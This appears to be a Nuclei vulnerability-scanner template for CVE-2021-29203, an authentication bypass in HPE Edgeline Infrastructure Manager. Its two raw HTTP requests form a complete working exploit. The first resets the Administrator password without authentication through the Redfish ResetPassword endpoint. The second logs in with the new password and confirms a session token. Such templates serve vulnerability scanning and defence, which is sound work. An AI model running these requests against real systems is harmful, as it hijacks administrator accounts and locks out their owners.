id: CVE-2021-29203
info:
  name: HPE Edgeline Infrastructure Manager v1.21 Authentication Bypass
  author: madrobot
  severity: critical
  tags: hpe,cve,cve2021,bypass
  reference: |
      - https://www.tenable.com/security/research/tra-2021-15
      - https://nvd.nist.gov/vuln/detail/CVE-2021-29203

requests:
  - raw:
      - |
        PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Accept: */*
        Content-Length: 23
        Content-Type: application/json
        Connection: close

        {"Password":"{{randstr}}"}

      - |
        POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Content-Length: 50
        Content-Type: application/json
        Connection: close

        {"UserName":"Administrator","Password":"{{randstr}}"}

    matchers-condition: and
    matchers:

      - type: status
        status:
          - 201

      - type: word
        condition: and
        part: header
        words:
          - "X-Auth-Token"
          - "PasswordReset"
          - "Location"

      - type: word
        part: body
        words:
          - "Base.1.0.Created"